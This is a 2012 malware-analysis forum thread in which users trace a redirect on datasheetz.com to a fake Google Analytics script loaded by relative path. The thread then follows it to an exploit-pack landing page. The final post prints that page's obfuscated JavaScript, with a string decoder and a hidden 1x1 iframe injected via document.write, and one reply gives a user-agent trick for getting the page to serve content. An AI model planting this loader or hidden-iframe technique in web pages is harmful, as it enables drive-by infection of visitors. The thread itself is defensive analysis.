Malware Domain List

Malware Related => Malware Analysis => Topic started by: SysAdMini on November 26, 2012, 02:04:14 pm

Title: Nice trick on datasheetz.com
Post by: SysAdMini on November 26, 2012, 02:04:14 pm
A suspicious url was being blocked by web filtering software. Referrer was datasheetz.com.
I looked at the code of datasheetz.com. At a first glance there was nothing suspicious to find.

(http://www.malwaredomainlist.com/pics/datasheetz1.png)

It took me some time to figure out where the suspicious url came from.
Look at the final script statement at the end of the page code.

Line

Code: [Select]
<script src="www.google-analytics.com/urchin.js" type="text/javascript"></script>
looks unsuspiciously, because it looks like a normal Google Analytics requests. But it's the key.
The url is missing the http:// statement. That means that the url is relative to the current url - actually

hxxp://datasheetz.com/www.google-analytics.com/urchin.js

There you can find the code creating the supicious url.

(http://www.malwaredomainlist.com/pics/datasheetz2.png)

(http://www.malwaredomainlist.com/pics/datasheetz3.png)

I don't get any content from that url. Please let me know if you get something. Url changes occasionally.

Title: Re: Nice trick on datasheetz.com
Post by: GmG on November 27, 2012, 02:31:32 pm
You need to include Java in the user agent string

like

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Java/1.7.0_5

Title: Re: Nice trick on datasheetz.com
Post by: SysAdMini on November 27, 2012, 02:49:13 pm
Thanks ! That brings me one step further.

Now I stuck at an url like this one:

Code: [Select]
http://www3.x9dci2nxllju.pcanywhere.net/?n3n5lc=kqjXmamYrXCVidWlq6Wekt7p2nChZp6YrW%2FFmqBj1Jw%3D
It resolves to 188.116.34.244, but doesn't respond.
Title: Re: Nice trick on datasheetz.com
Post by: GmG on November 27, 2012, 07:20:07 pm
the same for me

but it works in urlquery

http://urlquery.net/report.php?id=234953

http://www.kahusecurity.com/2012/analyzing-a-new-exploit-pack/

Title: Re: Nice trick on datasheetz.com
Post by: SysAdMini on November 27, 2012, 09:11:21 pm
Current url works.

Code: [Select]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"   >
<head><meta  content="text/html; charset=utf-8" http-equiv="Content-Type" /><meta http-equiv="Content-Language" content="en"
/>
<meta http-equiv="Cache-control" content="Public"  />  <link  href="http://www.yahoo.com/favicon.ico"></link>

<title>Smart Tools</title>
<script>function ty0mvk0t2Hu(iFoAu){iFoAu=iFoAu.replace(/~/gi,"\\").replace(/``/gi,"\"");var BlSlw="6874";var agFSNM;var guAA=[];function TKvzf(){var bZhQ='gTzU';if('RPpIXv'=='mCaJjp')sHTZo();}
var vFfUot=0;var NkMcK;for(var i=0;i<iFoAu.length;i++){if((iFoAu.length-i)>=parseInt(BlSlw.substring(vFfUot,vFfUot+1))){if('PEFQ'=='evPd')dyTI='aAhu';var pain=parseInt(BlSlw.substring(vFfUot,vFfUot+1));for(var i2=i+pain-1;i2>=i;i2--){guAA.push(iFoAu.substring(i2,i2+1));var bOVG;}
i+=parseInt(BlSlw.substring(vFfUot,vFfUot+1))-1;function HRSBJ(){}}else{var ch_i=i;guAA.push((iFoAu.substring((ch_i+1-1),(ch_i+1))));if('blkArJ'=='ySUudk')cZQgi='sKBaA';}
vFfUot++;if(vFfUot>BlSlw.length-1)vFfUot=0;if('KhCo'=='BHJBuE')jquL='XuKI';}
BRJi=window;BRJi["wW48wk9Gz5ruNyfQ0HT2VV"]=guAA.join('');if('chMi'=='cBvVw')PPLT='cMKEjG';}</script></head><body><div   id="lcAmX"
class="RWjBA&#66;" ></div><div
id="Zrq&#115;z"
qyerD="loQysd" class="UsTu"
></div>
<h2></h2>
<div
Xualiov="RFOwMGp"
id="KvDskKb"  class="ZEQxJH" ></div>
<script src="45270.js"></script>
<script>if('gDWTZ'=='cZLai')hoZTz='bGNpMu';function ZgqLdG(){}
var GchIb=document;var zaHceR;var ODbj="write";function lIaQ(){}
var VbXCqq="\x3c\x69f\x72ame  st\x79\x6c\x65=\"w\x69dt\x68:1px;he\x69ght:1px;po\x73it\x69on:\x61b\x73\x6flute\"  src=\"\x69.html\" \x3e\x3c/\x69fr\x61\x6de\x3e";var iqAKC=252;GchIb.psATl=GchIb[ODbj];if('iBYU'=='moYjY')OnFm='kInw';GchIb.psATl(VbXCqq);var OjkMuE=193;</script>
<div
id="&#102;zC&#113;"
class="mFqbp"  ></div><div  id="&#101;&#120;Row"  class="&#105;FjO" ></div><div  gUlZ="zwCmzF"  id="b&#75;x&#86;&#80;&#67;" class="c&#105;&#111;I"   ></div><div id="Za&#74;O&#120;y" class="&#82;mj&#72;"
></div></body>
<div
lRkysIQ="xhbUUqL"
id="OhtulPT"  class="fKHovrZHK" ></div>
</html>

http://urlquery.net/report.php?id=235488